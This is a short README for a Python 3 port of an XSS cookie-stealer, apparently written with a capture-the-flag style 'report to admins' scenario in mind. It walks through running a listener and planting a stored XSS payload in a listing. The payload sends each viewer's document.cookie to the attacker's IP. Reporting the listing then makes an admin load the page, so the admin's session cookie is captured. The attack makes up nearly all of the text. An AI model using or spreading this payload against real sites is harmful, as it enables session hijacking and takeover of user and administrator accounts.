I recreated it with Python 3 because it is a very old repository. The original author of this is @lnxg33k at github.com.
This is my circumstance, and I have the option of reporting to the admins button!, but there are a lot of other uses as well.
1- Change IP address in the script.
2- Run the script.
python3 XSS-cookie-stealer.py
3- Create a new listing and enter the exploit script.
<script>var i=new Image;i.src="http://(Your IP):8888/?"+document.cookie;</scirpt>
4- As soon as we submit, we should see our cookie appear on the http server running on our attack machine:
5- Let’s now click on the link and report listing to the admins:
6- Click ‘Report’ button and we should see the admin cookie appear on our http server: